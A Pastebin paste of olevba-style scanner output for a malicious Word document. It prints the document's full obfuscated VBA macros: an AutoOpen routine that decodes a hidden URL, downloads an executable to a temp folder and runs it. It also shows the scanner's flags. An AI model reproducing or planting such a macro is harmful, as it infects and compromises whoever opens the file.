Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- igm135809.doc
- (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: igm135809.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: igm135809.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- jQ5
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: igm135809.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ZBGUQzMmnNQjLfJi(MMzzbkwYsQ As String) As String
- GoTo QmoxUCfvciBJyeaaZe
- QmoxUCfvciBJyeaaZe:
- GoTo OtTFVZcTsVAkgUp
- OtTFVZcTsVAkgUp:
- GoTo kuddPCeAMbIaLPqebUnk
- kuddPCeAMbIaLPqebUnk:
- GoTo BHDPSh
- BHDPSh:
- For NZNKEQTrblrn = 1 To Len(MMzzbkwYsQ) Step 2
- GoTo YSwLeyRLBhqqpufYf
- YSwLeyRLBhqqpufYf:
- GoTo VmpskIYQAjlFinAKgthS
- VmpskIYQAjlFinAKgthS:
- GoTo PrZqcgGgsmEBYtRKGR
- PrZqcgGgsmEBYtRKGR:
- GoTo TGQojMOuOUcR
- TGQojMOuOUcR:
- GoTo HFKiovanmCFIAao
- HFKiovanmCFIAao:
- ZBGUQzMmnNQjLfJi = ZBGUQzMmnNQjLfJi & Mid(MMzzbkwYsQ, NZNKEQTrblrn, 1)
- GoTo BVyDQNwJjjKS
- BVyDQNwJjjKS:
- GoTo cGfwQxICUDbKUbQ
- cGfwQxICUDbKUbQ:
- GoTo OVYhEzdfLRlti
- OVYhEzdfLRlti:
- GoTo JIMyELdDCSILDcFk
- JIMyELdDCSILDcFk:
- GoTo EZOFTeMMzzbkwYsQvN
- EZOFTeMMzzbkwYsQvN:
- GoTo KEQTrblrnzPQmoxUC
- KEQTrblrnzPQmoxUC:
- Next
- GoTo iBJye
- iBJye:
- GoTo ZeOHO
- ZeOHO:
- GoTo FVZcTsVAkgUpgVkuddP
- FVZcTsVAkgUpgVkuddP:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: igm135809.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO dfsdfsdf.bas
- in file: igm135809.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function GHJbkjJKG Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
- ByVal gfhgfhF As String, _
- ByVal hjkhgFF As String, _
- ByVal gfhfghF As Long, _
- ByVal gfdgdf As LongPtr) As LongPtr
- #Else
- Private Declare Function GHJbkjJKG Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
- ByVal gfhgfhF As String, _
- ByVal hjkhgFF As String, _
- ByVal gfhfghF As Long, _
- ByVal gfdgdf As Long) As Long
- #End If
- Public Function ZXVDwjtQQrzvB71() As Integer
- Dim wFLdECQJIjCco17, aclHuKhrZdvFz71, ZGHsTHAroMpPX33, fjJHrRdaoktmZ65 As String
- Dim fcBkLtHUPAViT23, mWaFlcfvpbGqs65, xjTEqCqYYumMA98, jHsPLZznaTPjl82 As Integer
- fcBkLtHUPAViT23 = 6394
- wFLdECQJIjCco17 = R
- mWaFlcfvpbGqs65 = Asc(wFLdECQJIjCco17)
- If fcBkLtHUPAViT23 > mWaFlcfvpbGqs65 Then
- For xjTEqCqYYumMA98 = 1 To 54
- jHsPLZznaTPjl82 = mWaFlcfvpbGqs65 + xjTEqCqYYumMA98
- Next xjTEqCqYYumMA98
- jHsPLZznaTPjl82 = jHsPLZznaTPjl82 + fcBkLtHUPAViT23
- aclHuKhrZdvFz71 = CStr(jHsPLZznaTPjl82)
- ZGHsTHAroMpPX33 = Mid$(aclHuKhrZdvFz71, 1, 4)
- fjJHrRdaoktmZ65 = fjJHrRdaoktmZ65 & "25"
- ZXVDwjtQQrzvB71 = CInt(Mid$(fjJHrRdaoktmZ65, 2, 6))
- Else
- ZXVDwjtQQrzvB71 = 54 + 6394
- MsgBox ("dvuZGYOgDjMWl95")
- End Function
- Sub jQ5()
- mog4O4d49 ZBGUQzMmnNQjLfJi("hot}t€p.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|")
- End Sub
- Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
- vJHKBJdfkgfg = GHJbkjJKG(0&, Mh9_094suu, R4_t, 0&, 0&)
- Dim j_W8
- j_W8 = Shell(R4_t, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: igm135809.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement